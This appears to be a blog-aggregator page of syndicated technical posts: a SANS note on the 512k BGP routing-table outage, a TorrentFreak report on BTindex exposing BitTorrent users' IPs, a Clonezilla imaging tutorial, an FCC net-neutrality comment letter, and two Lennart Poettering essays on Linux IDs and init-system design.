This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

[Update] See http://www.bgpmon.net/what-caused-todays-internet-hiccup/ for a good summary of what happened.

 

Tuesday morning, various networks experienced outages from 4-6am EDT (8-10am UTC) [1]. It appears the outage was the result of a somewhat anticipated problem with older routers and their inability to deal with the ever increasing size of the Internet’s routing table.

These BGP routers need to store a map of the Internet defining which IP address range belongs to which network. Due to the increasing scarcity of IPv4 space, registrars and ISPs assign smaller and smaller netblocks to customers, leading to a more and more fragmented topology. Many older routers can only store 512k entries, and the Internet’s routing table has become large enough to reach this limit. Tuesday morning, it appears to have exceeded this limit for a short time [2][3].

The large number of route announcements and immediate removals shown in [2] could indicate malicious intent behind these events (or a simple configuration error), but either way likely points to one entity briefly “pushing” the size of the routing table beyond the 512k limit. At around this time, one larger ISP (Windstream, AS7029) recovered from an unrelated outage, and routing changes due to the recovery are one suspect that may have triggered the event.

Vendors have published guidance for users of older routers on how to avoid this issue [5]. This guidance has been available for a while. Please contact your vendor if you are affected. You may also want to consider upgrading your router. The routing table is likely going to get larger over the next few years until networks rely less on IPv4 and take advantage of IPv6.
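
If you operate a router yourself, a quick way to get a feel for the problem is to compare your table size against the 512k (524,288) mark. A minimal sketch, assuming a Linux-based router that carries a full IPv4 table in its kernel FIB (and Quagga's bgpd, if you use it); the exact output will vary with your setup:

# count IPv4 routes in the kernel routing table and compare against 524288
$ ip -4 route show | wc -l
# on a Quagga router, the BGP summary also reports table size
$ vtysh -c 'show ip bgp summary'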

 

[1] https://puck.nether.net/pipermail/outages/2014-August/007090.html
[2] http://www.cymru.com/BGP/prefix_delta.html (see the spike in deltas around that time)
[3] http://www.cidr-report.org/2.0/#General_Status (note how close it is to 512k and rising)
[4] http://www.thewhir.com/web-hosting-news/liquidweb-among-companies-affected-major-outage-across-us-network-providers
[5] http://www.cisco.com/c/en/us/support/docs/switches/catalyst-6500-series-switches/117712-problemsolution-cat6500-00.html
 

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.

My SANS Teaching Schedule

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: BTindex Exposes IP-Addresses of BitTorrent Users

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Unless BitTorrent users are taking steps to hide their identities through the use of a VPN, proxy, or seedbox, their downloading habits are available for almost anyone to snoop on.

By design the BitTorrent protocol shares the location of any user in the swarm. After all, without knowing where to send the data nothing can be shared to begin with.

Despite this fairly common knowledge, even some experienced BitTorrent users can be shocked to learn that someone has been monitoring their activities, let alone that their sharing activity is being made public for the rest of the world to see.

Like it or not, this is exactly what the newly launched torrent search engine BTindex is doing.

Unlike most popular torrent sites, BTindex adds new content by crawling BitTorrent’s DHT network. This is already quite unusual, as most other sites get their content from user uploads or other sites. Without doubt, however, the most controversial part is that the IP-addresses of BitTorrent users are being shared as well.

People who download a file from The Pirate Bay or any other torrent site expose their IP-addresses via the DHT network. BTindex records this information alongside the torrent metadata. The number of peers is displayed in the search results, and for each file a selection of IP-addresses is made available to the public.

The image below shows a selection of peers who shared a pirated copy of the movie “Transcendence,” this week’s most downloaded film.

Some IP-addresses sharing “Transcendence.”

Perhaps even more worrying to some, the site also gives an overview of all recorded downloads per IP-address. While the database is not exhaustive there is plenty of dirt to be found on heavy BitTorrent users who have DHT enabled in their clients.

Below is an example of the files that were shared via the IP-address of a popular VPN provider.

Files shared by the IP-address of a popular VPN provider

Since all data is collected through the DHT network people can avoid being tracked by disabling this feature in their BitTorrent clients. Unfortunately, that only gives a false sense of security as there are plenty of other monitoring firms who track people by gathering IP-addresses directly from the trackers.

The idea to index and expose IP-addresses of public BitTorrent users is not entirely new. In 2011 YouHaveDownloaded did something similar. This site generated considerable interest but was shut down a few months after its launch.

If anything, these sites should act as a wake up call to people who regularly share files via BitTorrent without countermeasures. Depending on the type of files being shared, a mention on BTindex is probably the least of their worries.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: How to Image and Clone Hard Drives with Clonezilla

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

Figure 1: Creating the FAT32 partition in GParted.

Clonezilla is a partition and disk cloning application for Linux, Free-, Net-, and OpenBSD, Mac OS X, Windows, and Minix. It supports all the major filesystems including ext2/3/4, NTFS, FAT, XFS, JFS, and Btrfs, as well as LVM2 and VMware’s enterprise clustering filesystems VMFS3 and VMFS5. Clonezilla supports 32- and 64-bit systems, both legacy and UEFI BIOS, and both MBR and GPT partition tables. It’s a good tool for backing up a complete Windows system with all of your installed applications, and I like it for making copies of Linux test systems so that I can trash them with mad experiments and then quickly restore them.

Clonezilla can also copy unsupported filesystems with the dd command, which copies blocks rather than files, so it doesn’t need to understand filesystems. So, the short story is Clonezilla can copy anything. (A quick note on blocks: disk sectors are the smallest addressable storage units on hard disks, and blocks are logical data structures made up of single or multiple sectors.)
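
For a sense of what such a block-level copy looks like outside of Clonezilla, here is a minimal dd sketch (the device and image names are examples only, and the source partition must be unmounted first):

# back up a partition, block for block, into an image file
$ sudo dd if=/dev/sdb1 of=/mnt/backup/sdb1.img bs=4M
# restoring is the same command with if= and of= swapped
$ sudo dd if=/mnt/backup/sdb1.img of=/dev/sdb1 bs=4M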

Clonezilla comes in two versions: Clonezilla Live and Clonezilla Server Edition (SE). Clonezilla Live is ace for cloning single computers to a local storage device or network share. Clonezilla SE is for larger deployments, and for fast multicast cloning of an entire network of PCs at once. Clonezilla SE is a wonderful bit of software that we shall cover in the future. Today we shall create a Clonezilla Live USB stick, clone something, and restore it.

Clonezilla and Tuxboot

When you visit the download page you’ll see Stable and Alternative Stable releases. There are also Testing releases, which I recommend if you’re interested in helping to improve Clonezilla. Stable is based on Debian and includes no non-Free software. Alternative Stable is based on Ubuntu, includes some non-Free firmware, and supports UEFI Secure Boot.

After you download Clonezilla, install Tuxboot to copy Clonezilla to a USB stick. Tuxboot is a modification of Unetbootin that supports Clonezilla; plain Unetbootin won’t work. Installing Tuxboot is a bit of a pain, though Ubuntu users can install it the easy way from a personal package archive (PPA):

$ sudo apt-add-repository ppa:thomas.tsai/ubuntu-tuxboot
$ sudo apt-get update
$ sudo apt-get install tuxboot

If you’re not running Ubuntu and your Linux distribution doesn’t include a packaged version of Tuxboot, download the source tarball and follow the instructions in the README.txt file to compile and install it.

Once you get Tuxboot installed, use it to create your nice live bootable Clonezilla USB stick. First create a FAT32 partition of at least 200 megabytes; figure 1 (above) shows how it’s done in GParted. I like to use labels, like “clonezilla”, so I know what it is. This example shows a 2GB stick formatted as a single partition.
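
If you prefer the command line to GParted, a rough equivalent looks like this (a sketch; it assumes the stick really is /dev/sdd and that you are happy to wipe it):

# create a new MBR partition table with a single FAT32 partition
$ sudo parted --script /dev/sdd mklabel msdos mkpart primary fat32 1MiB 100%
# format and label it
$ sudo mkfs.vfat -F 32 -n CLONEZILLA /dev/sdd1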

Then fire up Tuxboot (figure 2). Check “Pre-downloaded” and click the button with the ellipsis to select your Clonezilla file. It should find your USB stick automatically, and you should check the partition number to make sure it found the right one. In my example that is /dev/sdd1. Click OK, and when it’s finished click Exit. It asks you if you want to reboot now, but don’t worry because it won’t. Now you have a nice portable Clonezilla USB stick you can use almost anywhere.

Figure 2: Tuxboot.

Creating a Drive Image

Boot up your Clonezilla USB stick on the computer that you want to backup, and the first thing you’ll see is a normal-looking boot menu. Boot to the default entry. You’ll be asked language and keyboard questions, and when you arrive at the Start Clonezilla menu select Start Clonezilla. In the next menu select device_image, then go to the next screen.

This screen is a little confusing, with options for local_dev, ssh_server, samba_server, and nfs_server. This is where you select the location for your backup image to be copied to. If you choose local_dev, then you’ll need a local partition with enough room to store your image. An attached USB hard drive is a nice fast and easy option. If you choose any of the server options you’ll need a wired Ethernet connection, the IP address of your server, and your login. I’ll use a local partition, which means selecting local_dev.

When you select local_dev Clonezilla scans all of your locally-attached storage, including hard disks and USB storage devices, and makes a list of your partitions. Select the one you want to store your new image in, and then it asks which directory to use and shows you a list. Select your desired directory, and the next screen shows all of your mounts and used/available space. Press Enter, and the next screen gives you the option of Beginner or Expert mode. I choose Beginner.

In the next screen you can choose savedisk, which creates an image of an entire hard disk, or save_parts, which allows you to select individual partitions. I want to select partitions.

The next screen asks for a name for your new image. After accepting the default or entering your own name, go to the next screen. Clonezilla scans your partitions and creates a checklist so you can pick the ones you want to copy. After making your selections, the next screen gives you the option to do a filesystem check and repair. I’m impatient, so I skip this part.

The next screen asks if you want Clonezilla to check your newly-created image to make sure it is restorable. I always say yes. Next, it gives you a command-line hint in case you ever want to use the command-line instead of the GUI, and you must press Enter again. You get one more confirmation, and then type y for Yes to make the copy.

You get to watch a nice red, white, and blue progress screen while Clonezilla creates your new image (figure 3).

Figure 3: Clonezilla’s progress screen.

When it’s all finished press Enter and then select reboot, and remember to remove your Clonezilla USB stick. Boot up your computer normally, and go look at your nice new Clonezilla image. You should see something like this:

$ ls -l /2014-08-07-11-img/
total 1241448
-rw-r--r-- 1 root root       1223 Aug  7 04:22 blkdev.list
-rw-r--r-- 1 root root        636 Aug  7 04:22 blkid.list
-rw-r--r-- 1 root root       3658 Aug  7 04:24 clonezilla-img
-rw-r--r-- 1 root root      12379 Aug  7 04:24 Info-dmi.txt
-rw-r--r-- 1 root root      22685 Aug  7 04:24 Info-lshw.txt
-rw-r--r-- 1 root root       3652 Aug  7 04:24 Info-lspci.txt
-rw-r--r-- 1 root root        171 Aug  7 04:24 Info-packages.txt
-rw-r--r-- 1 root root         86 Aug  7 04:24 Info-saved-by-cmd.txt
-rw-r--r-- 1 root root          5 Aug  7 04:24 parts
-rw------- 1 root root 1270096769 Aug  7 04:24 sda6.ext4-ptcl-img.gz.aa
-rw-r--r-- 1 root root         37 Aug  7 04:22 sda-chs.sf
-rw-r--r-- 1 root root    1048064 Aug  7 04:22 sda-hidden-data-after-mbr
-rw-r--r-- 1 root root        512 Aug  7 04:22 sda-mbr
-rw-r--r-- 1 root root        750 Aug  7 04:22 sda-pt.parted
-rw-r--r-- 1 root root        625 Aug  7 04:22 sda-pt.parted.compact
-rw-r--r-- 1 root root        514 Aug  7 04:22 sda-pt.sf

Restoring a Clonezilla Image

Restoring your image is similar to creating it. Again, boot up Clonezilla, go through the same initial steps, select device_image, and then on the local_dev screen select the location of the image that you want to restore, whether it’s on a local device or network share. Then continue through the rest of the screens, making sure that you have the correct restore image and target locations selected.

You can learn more of Clonezilla’s amazing powers at the Clonezilla Live Documentation page.

Bradley M. Kuhn's Blog ( bkuhn ): Be Sure to Comment on FCC’s NPRM 14-28

This post was syndicated from: Bradley M. Kuhn's Blog ( bkuhn ) and was written by: Bradley M. Kuhn. Original post: at Bradley M. Kuhn's Blog ( bkuhn )

I remind everyone today, particularly USA Citizens, to be sure to comment on
the FCC’s Notice of Proposed Rulemaking (NPRM) 14-28. They even did a sane
thing and provided an email address you can write to rather than using their
poorly designed web forums, but PC Magazine published relatively complete
instructions for other ways. The deadline isn’t for a while yet, but it’s
worth getting it done so you don’t forget. Below is my letter in case anyone
is interested.

Dear FCC Commissioners,

I am writing in response to NPRM 14-28 — your request for comments regarding
the “Open Internet”.

I am a trained computer scientist and I work in the technology industry.
(I’m a software developer and software freedom activist.) I have subscribed
to home network services since 1989, starting with the Prodigy service, and
switching to Internet service in 1991. Initially, I used a PSTN single-pair
modem and eventually upgraded to DSL in 1999. I still have a DSL line, but
it’s sadly not much faster than the one I had in 1999, and I explain below
why.

In fact, I’ve watched the situation get progressively worse, not better,
since the Telecommunications Act of 1996. While my download speeds are a
little bit faster than they were in the late 1990s, I now pay
substantially more for only small increases in upload speed, even in a
major urban market. In short, it’s become increasingly difficult
to actually purchase true Internet connectivity service anywhere in the
USA. But first, let me explain what I mean by “true Internet
connectivity”.

The Internet was created as a peer-to-peer medium where all nodes were
equal. In the original design of the Internet, every device has its own
IP address and, if the user wanted, that device could be addressed
directly and fully by any other device on the Internet. For its part,
the network in between the two nodes was intended to merely move the
packets between those nodes as quickly as possible — treating all those
packets the same way, and analyzing those packets only with publicly
available algorithms that everyone agreed were correct and fair.

Of course, the companies who typically appeal to (or even fight) the FCC
want the true Internet to simply die. They seek to turn the promise of
a truly peer-to-peer network of equality into a traditional broadcast
medium that they control. They frankly want to manipulate the Internet
into a mere television broadcast system (with the only improvement to
that being “more stations”).

Because of this, the three following features of the Internet —
inherent in its design — are now extremely difficult for
individual home users to purchase at reasonable cost from so-called
“Internet providers” like Time Warner, Verizon, and Comcast:

  • A static IP address, which allows the user to be a true, equal node on
    the Internet. (And, related: IPv6 addresses, which could end the claim
    that static IP addresses are a precious resource.)
  • An unfiltered connection, that allows the user to run their own
    webserver, email server and the like. (Most of these companies block TCP
    ports 80 and 25 at the least, and usually many more ports, too).
  • Reasonable choices between the upload/download speed tradeoff.

For example, in New York, I currently pay nearly $150/month to an
independent ISP just to have a static, unfiltered IP address with 10
Mbps down and 2 Mbps up. I work from home and the 2 Mbps up is
incredibly slow for modern usage. However, I still live in the Slowness
because upload speeds greater than that are extremely price-restrictive
from any provider.

In other words, these carriers have designed their networks to
prioritize all downloading over all uploading, and to purposely place
the user behind many levels of Network Address Translation and network
filtering. In this environment, many Internet applications simply do
not work (or require complex work-arounds that disable key features).
As an example: true diversity in VoIP accessibility and service has
almost entirely been superseded by proprietary single-company services
(such as Skype) because SIP, designed by the IETF (in part) for VoIP
applications, did not fully anticipate that nearly every user would be
behind NAT and unable to use SIP without complex work-arounds.

I believe this disastrous situation centers around problems with the
Telecommunications Act of 1996. While the ILECs are theoretically
required to license network infrastructure fairly at bulk rates to
CLECs, I’ve frequently seen — both professionally and personally — wars
waged against CLECs by ILECs. CLECs simply can’t offer their own types
of services that merely “use” the ILECs’ connectivity. The technical
restrictions placed by ILECs force CLECs to offer the same style of
service the ILEC offers, and at a higher price (to cover their
additional overhead in dealing with the CLECs)! It’s no wonder there
are hardly any CLECs left.

Indeed, in my 25 year career as a technologist, I’ve seen many nasty
tricks by Verizon here in NYC, such as purposeful work-slowdowns in
resolution of outages and Verizon technicians outright lying to me and
to CLEC technicians about the state of their network. For my part, I
stick with one of the last independent ISPs in NYC, but I suspect they
won’t be able to keep their business going for long. Verizon either (a)
buys up any CLEC that looks too powerful, or, (b) if Verizon can’t buy
them, Verizon slowly squeezes them out of business with dirty tricks.

The end result is that we don’t have real options for true Internet
connectivity for home or on-site business use. I’m already priced
out of getting a 10 Mbps upload with a static IP and all ports usable.
I suspect within 5 years, I’ll be priced out of my current 2 Mbps upload
with a static IP and all ports usable.

I realize the problems that most users are concerned about on this issue
relate to their ability to download bytes from third-party companies
like Netflix. Therefore, it’s all too easy for Verizon to play out this
argument as if it’s big companies vs. big companies.

However, the real fallout from the current system is that the cost for
personal Internet connectivity that allows individuals equal existence
on the network is so high that few bother. The consequence, thus, is
that only those who are heavily involved in the technology industry even
know what types of applications would be available if everyone had a
static IP with all ports usable and equal upload and download speeds
of 10 Mbps or higher.

Yet, that’s the exact promise of network connectivity that I was taught
about as an undergraduate in Computer Science in the early 1990s. What
I see today is the dystopian version of the promise. My generation of
computer scientists have been forced to constrain their designs of
Internet-enabled applications to fit a model that the network carriers
dictate.

I realize you can’t possibly fix all these social ills in the network
connectivity industry with one rule-making, but I hope my comments have
perhaps given a slightly different perspective of what you’ll hear from
most of the other commenters on this issue. I thank you for reading my
comments and would be delighted to talk further with any of your staff
about these issues at your convenience.

Sincerely,

Bradley M. Kuhn,
a citizen of the USA since birth, currently living in New York, NY.

Pid Eins: On IDs

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

When programming software that cooperates with software running on behalf of
other users, other sessions or other computers it is often necessary to work with
unique identifiers. These can be bound to various hardware and software objects
as well as lifetimes. Often, when people look for such an ID to use they pick
the wrong one because the semantics and lifetime of the IDs are not clear. Here’s a
short, non-exhaustive list of IDs accessible on Linux and how you should or
should not use them.

Hardware IDs

  1. /sys/class/dmi/id/product_uuid: The main board product UUID, as
    set by the board manufacturer and encoded in the BIOS DMI information. It may
    be used to identify a mainboard and only the mainboard. It changes when the
    user replaces the main board. Also, often enough BIOS manufacturers write bogus
    serials into it. In addition, it is x86-specific. Access for unprivileged users
    is forbidden. Hence it is of little general use.
  2. CPUID/EAX=3 CPU serial number: A CPU UUID, as set by the
    CPU manufacturer and encoded on the CPU chip. It may be used to identify a CPU
    and only a CPU. It changes when the user replaces the CPU. Also, most modern
    CPUs don’t implement this feature anymore, and older computers tend to disable
    this option by default, controllable via a BIOS Setup option. In addition, it
    is x86-specific. Hence this too is of little general use.
  3. /sys/class/net/*/address: One or more network MAC addresses, as
    set by the network adapter manufacturer and encoded on some network card
    EEPROM. It changes when the user replaces the network card. Since network cards
    are optional and there may be more than one, the availability of this ID is not
    guaranteed and you might have more than one to choose from. On virtual machines
    the MAC addresses tend to be random. This too is hence of little general use.
  4. /sys/bus/usb/devices/*/serial: Serial numbers of various USB
    devices, as encoded in the USB device EEPROM. Most devices don’t have a serial
    number set, and if they have one it is often bogus. If the user replaces his USB
    hardware or plugs it into another machine these IDs may change or appear in
    other machines. This hence too is of little use.

There are various other hardware IDs available, many of which you may
discover via the ID_SERIAL udev property of various devices, such as hard disks
and similar. They all have in common that they are bound to specific
(replaceable) hardware, not universally available, often filled with bogus data
and random in virtualized environments. Or in other words: don’t use them, don’t
rely on them for identification unless you really know what you are doing; in
general they do not guarantee what you might hope they guarantee. (If you want
to see for yourself, the short example below reads a few of them.)
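
A quick way to peek at a few of them from a shell (a sketch; several of these will be empty, bogus, or readable only as root, which rather proves the point):

$ sudo cat /sys/class/dmi/id/product_uuid
$ cat /sys/class/net/*/address
$ cat /sys/bus/usb/devices/*/serial 2>/dev/null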

Software IDs

  1. /proc/sys/kernel/random/boot_id: A random ID that is regenerated
    on each boot. As such it can be used to identify the local machine’s current
    boot. It’s universally available on any recent Linux kernel. It’s a good and
    safe choice if you need to identify a specific boot on a specific booted
    kernel.
  2. gethostname(), /proc/sys/kernel/hostname: A non-random ID
    configured by the administrator to identify a machine in the network. Often
    this is not set at all or is set to some default value such as
    localhost and not even unique in the local network. In addition it
    might change during runtime, for example because it changes based on updated
    DHCP information. As such it is almost entirely useless for anything but
    presentation to the user. It has very weak semantics and relies on correct
    configuration by the administrator. Don’t use this to identify machines in a
    distributed environment. It won’t work unless centrally administered, which
    makes it useless in a globalized, mobile world. It has no place in
    automatically generated filenames that shall be bound to specific hosts. Just
    don’t use it, please. It’s really not what many people think it is.
    gethostname() is standardized in POSIX and hence portable to other
    Unixes.
  3. IP Addresses returned by SIOCGIFCONF or the respective Netlink APIs: These
    tend to be dynamically assigned and often enough only valid on local networks
    or even only the local links (i.e. 192.168.x.x style addresses, or even
    169.254.x.x/IPv4LL). Unfortunately they hence have little use outside of
    networking.
  4. gethostid(): Returns a supposedly unique 32-bit identifier for the
    current machine. The semantics of this is not clear. On most machines this
    simply returns a value based on a local IPv4 address. On others it is
    administrator controlled via the /etc/hostid file. Since the semantics
    of this ID are not clear, and it is most often just a value based on the IP address, it is
    almost always the wrong choice to use. On top of that, 32 bits are not
    particularly a lot. On the other hand this is standardized in POSIX and hence
    portable to other Unixes. It’s probably best to ignore this value and if people
    don’t want to ignore it they should probably symlink /etc/hostid to
    /var/lib/dbus/machine-id or something similar.
  5. /var/lib/dbus/machine-id: An ID identifying a specific Linux/Unix
    installation. It does not change if hardware is replaced, and unlike the hardware
    IDs above it remains reliable in virtualized environments. This value has clear
    semantics and is considered
    part of the D-Bus API. It is supposedly globally unique and portable to all
    systems that have D-Bus. On Linux, it is universally available, given that
    almost all non-embedded and even a fair share of the embedded machines ship
    D-Bus now. This is the recommended way to identify a machine, possibly with a
    fallback to the host name to cover systems that still lack D-Bus. If your
    application links against libdbus, you may access this ID with
    dbus_get_local_machine_id(); if not, you can read it directly from the file
    system (see the short example after this list).
  6. /proc/self/sessionid: An ID identifying a specific Linux login
    session. This ID is maintained by the kernel and part of the auditing logic. It
    is uniquely assigned to each login session during a specific system boot,
    shared by each process of a session, even across su/sudo and cannot be changed
    by userspace. Unfortunately some distributions have so far failed to set things
    up properly for this to work (Hey, you, Ubuntu!), and this ID is always
    (uint32_t) -1 for them. But there’s hope they get this fixed
    eventually. Nonetheless it is a good choice for a unique session identifier on
    the local machine and for the current boot. To make this ID globally unique it
    is best combined with /proc/sys/kernel/random/boot_id.
  7. getuid(): An ID identifying a specific Unix/Linux user. This ID is
    usually automatically assigned when a user is created. It is not unique across
    machines and may be reassigned to a different user if the original user was
    deleted. As such it should be used only locally and with the limited validity
    in time in mind. To make this ID globally unique it is not sufficient to
    combine it with /var/lib/dbus/machine-id, because the same ID might be
    used for a different user that is created later with the same UID. Nonetheless
    this combination is often good enough. It is available on all POSIX systems.
  8. ID_FS_UUID: an ID that identifies a specific file system in the
    udev tree. It is not always clear how these serials are generated but this
    tends to be available on almost all modern disk file systems. It is not
    available for NFS mounts or virtual file systems. Nonetheless this is often a
    good way to identify a file system, and in the case of the root directory even
    an installation. However due to the weakly defined generation semantics the
    D-Bus machine ID is generally preferable.
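
To get a feel for these, here is how a few of the software IDs can be read from a shell (a sketch; the values are machine-specific, and /proc/self/sessionid will read 4294967295 on systems where auditing is not set up):

$ cat /var/lib/dbus/machine-id
$ cat /proc/sys/kernel/random/boot_id
$ cat /proc/self/sessionid; echo
# the numeric UID that getuid() would return
$ id -u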

Generating IDs

Linux offers a kernel interface to generate UUIDs on demand, by reading from
/proc/sys/kernel/random/uuid. This is a very simple interface to
generate UUIDs. That said, the logic behind UUIDs is unnecessarily complex and
often it is a better choice to simply read 16 bytes or so from
/dev/urandom.
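
For example (a sketch; each read produces a fresh random value):

$ cat /proc/sys/kernel/random/uuid
# or simply take 16 random bytes and print them as hex
$ head -c 16 /dev/urandom | od -An -tx1 | tr -d ' \n'; echo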

Summary

And the gist of it all: Use /var/lib/dbus/machine-id! Use
/proc/self/sessionid! Use /proc/sys/kernel/random/boot_id!
Use getuid()! Use /dev/urandom!
And forget about the
rest, in particular the host name, or the hardware IDs such as DMI. And keep in
mind that you may combine the aforementioned IDs in various ways to get
different semantics and validity constraints.

Pid Eins: Rethinking PID 1

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

If you are well connected or good at reading between the lines
you might already know what this blog post is about. But even then
you may find this story interesting. So grab a cup of coffee,
sit down, and read what’s coming.

This blog story is long, so even though I can only recommend
reading the long story, here’s the one sentence summary: we are
experimenting with a new init system and it is fun.

Here’s the code. And here’s the story:

Process Identifier 1

On every Unix system there is one process with the special
process identifier 1. It is started by the kernel before all other
processes and is the parent process for all those other processes
that have nobody else to be child of. Due to that it can do a lot
of stuff that other processes cannot do. And it is also
responsible for some things that other processes are not
responsible for, such as bringing up and maintaining userspace
during boot.

Historically on Linux the software acting as PID 1 was the
venerable sysvinit package, though it had been showing its age for
quite a while. Many replacements have been suggested, only one of
them really took off: Upstart, which has by now found
its way into all major distributions.

As mentioned, the central responsibility of an init system is
to bring up userspace. And a good init system does that
fast. Unfortunately, the traditional SysV init system was not
particularly fast.

For a fast and efficient boot-up two things are crucial:

  • To start less.
  • And to start more in parallel.

What does that mean? Starting less means starting fewer
services or deferring the starting of services until they are
actually needed. There are some services where we know that they
will be required sooner or later (syslog, D-Bus system bus, etc.),
but for many others this isn’t the case. For example, bluetoothd
does not need to be running unless a bluetooth dongle is actually
plugged in or an application wants to talk to its D-Bus
interfaces. Same for a printing system: unless the machine
physically is connected to a printer, or an application wants to
print something, there is no need to run a printing daemon such as
CUPS. Avahi: if the machine is not connected to a
network, there is no need to run Avahi, unless some application wants
to use its APIs. And even SSH: as long as nobody wants to contact
your machine there is no need to run it, as long as it is then
started on the first connection. (And admit it, on most machines
where sshd might be listening somebody connects to it only every
other month or so.)

Starting more in parallel means that if we have
to run something, we should not serialize its start-up (as sysvinit
does), but run it all at the same time, so that the available
CPU and disk IO bandwidth is maxed out, and hence
the overall start-up time minimized.

Hardware and Software Change Dynamically

Modern systems (especially general purpose OS) are highly
dynamic in their configuration and use: they are mobile, different
applications are started and stopped, different hardware added and
removed again. An init system that is responsible for maintaining
services needs to listen to hardware and software
changes. It needs to dynamically start (and sometimes stop)
services as they are needed to run a program or enable some
hardware.

Most current systems that try to parallelize boot-up still
synchronize the start-up of the various daemons involved: since
Avahi needs D-Bus, D-Bus is started first, and only when D-Bus
signals that it is ready, Avahi is started too. Similar for other
services: libvirtd and X11 need HAL (well, I am considering the
Fedora 13 services here, ignore that HAL is obsolete), hence HAL
is started first, before libvirtd and X11 are started. And
libvirtd also needs Avahi, so it waits for Avahi too. And all of
them require syslog, so they all wait until Syslog is fully
started up and initialized. And so on.

Parallelizing Socket Services

This kind of start-up synchronization results in the
serialization of a significant part of the boot process. Wouldn’t
it be great if we could get rid of the synchronization and
serialization cost? Well, we can, actually. For that, we need to
understand what exactly the daemons require from each other, and
why their start-up is delayed. For traditional Unix daemons,
there’s one answer to it: they wait until the socket the other
daemon offers its services on is ready for connections. Usually
that is an AF_UNIX socket in the file-system, but it could be
AF_INET[6], too. For example, clients of D-Bus wait until
/var/run/dbus/system_bus_socket can be connected to,
clients of syslog wait for /dev/log, clients of CUPS wait
for /var/run/cups/cups.sock and NFS mounts wait for
/var/run/rpcbind.sock and the portmapper IP port, and so
on. And think about it, this is actually the only thing they wait
for!

Now, if that’s all they are waiting for, if we manage to make
those sockets available for connection earlier and only actually
wait for that instead of the full daemon start-up, then we can
speed up the entire boot and start more processes in parallel. So,
how can we do that? Actually quite easily in Unix-like systems: we
can create the listening sockets before we actually start
the daemon, and then just pass the socket during exec()
to it. That way, we can create all sockets for all
daemons in one step in the init system, and then in a second step
run all daemons at once. If a service needs another, and it is not
fully started up, that’s completely OK: what will happen is that
the connection is queued in the providing service and the client
will potentially block on that single request. But only that one
client will block and only on that one request. Also, dependencies
between services will no longer necessarily have to be configured
to allow proper parallelized start-up: if we start all sockets at
once and a service needs another it can be sure that it can
connect to its socket.
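
As an aside, this pattern is easy to play with today using a small helper that later shipped with systemd (it did not exist when this was written); a sketch that turns plain cat into a socket-activated echo service on TCP port 2000:

$ systemd-socket-activate --inetd --accept -l 2000 /bin/cat
# in a second terminal, connect and type something; cat is only
# spawned once the first connection arrives
$ nc localhost 2000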

Because this is at the core of what is following, let me say
this again, with different words and by example: if you start
syslog and various syslog clients at the same time, what will
happen in the scheme pointed out above is that the messages of the
clients will be added to the /dev/log socket buffer. As
long as that buffer doesn’t run full, the clients will not have to
wait in any way and can immediately proceed with their start-up. As
soon as syslog itself finished start-up, it will dequeue all
messages and process them. Another example: we start D-Bus and
several clients at the same time. If a synchronous bus
request is sent and hence a reply expected, what will happen is
that the client will have to block, however only that one client
and only until D-Bus managed to catch up and process it.

Basically, the kernel socket buffers help us to maximize
parallelization, and the ordering and synchronization is done by
the kernel, without any further management from userspace! And if
all the sockets are available before the daemons actually start-up,
dependency management also becomes redundant (or at least
secondary): if a daemon needs another daemon, it will just connect
to it. If the other daemon is already started, this will
immediately succeed. If it isn’t started but in the process of
being started, the first daemon will not even have to wait for it,
unless it issues a synchronous request. And even if the other
daemon is not running at all, it can be auto-spawned. From the
first daemon’s perspective there is no difference, hence dependency
management becomes mostly unnecessary or at least secondary, and
all of this in optimal parallelization and optionally with
on-demand loading. On top of this, this is also more robust, because
the sockets stay available regardless whether the actual daemons
might temporarily become unavailable (maybe due to crashing). In
fact, you can easily write a daemon with this that can run, and
exit (or crash), and run again and exit again (and so on), and all
of that without the clients noticing or losing any request.

It’s a good time for a pause, go and refill your coffee mug,
and be assured, there is more interesting stuff following.

But first, let’s clear a few things up: is this kind of logic
new? No, it certainly is not. The most prominent system that works
like this is Apple’s launchd system: on MacOS the listening of the
sockets is pulled out of all daemons and done by launchd. The
services themselves hence can all start up in parallel and
dependencies need not be configured for them. And that is
actually a really ingenious design, and the primary reason why
MacOS manages to provide the fantastic boot-up times it
provides. I can highly recommend this
video
where the launchd folks explain what they are
doing. Unfortunately this idea never really caught on outside of the Apple
camp.

The idea is actually even older than launchd. Prior to launchd
the venerable inetd worked much like this: sockets were
centrally created in a daemon that would start the actual service
daemons passing the socket file descriptors during
exec(). However the focus of inetd certainly
wasn’t local services, but Internet services (although later
reimplementations supported AF_UNIX sockets, too). It also wasn’t a
tool to parallelize boot-up or even useful for getting implicit
dependencies right.

For TCP sockets inetd was primarily used in a way that
for every incoming connection a new daemon instance was
spawned. That meant that for each connection a new
process was spawned and initialized, which is not a
recipe for high-performance servers. However, right from the
beginning inetd also supported another mode, where a
single daemon was spawned on the first connection, and that single
instance would then go on and also accept the follow-up connections
(that’s what the wait/nowait option in
inetd.conf was for, a particularly badly documented
option, unfortunately.) Per-connection daemon starts probably gave
inetd its bad reputation for being slow. But that’s not entirely
fair.

Parallelizing Bus Services

Modern daemons on Linux tend to provide services via D-Bus
instead of plain AF_UNIX sockets. Now, the question is, for those
services, can we apply the same parallelizing boot logic as for
traditional socket services? Yes, we can, D-Bus already has all
the right hooks for it: using bus activation a service can be
started the first time it is accessed. Bus activation also gives
us the minimal per-request synchronisation we need for starting up
the providers and the consumers of D-Bus services at the same
time: if we want to start Avahi at the same time as CUPS (side
note: CUPS uses Avahi to browse for mDNS/DNS-SD printers), then we
can simply run them at the same time, and if CUPS is quicker than
Avahi via the bus activation logic we can get D-Bus to queue the
request until Avahi manages to establish its service name.

So, in summary: the socket-based service activation and the
bus-based service activation together enable us to start
all daemons in parallel, without any further
synchronization. Activation also allows us to do lazy-loading of
services: if a service is rarely used, we can just load it the
first time somebody accesses the socket or bus name, instead of
starting it during boot.
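
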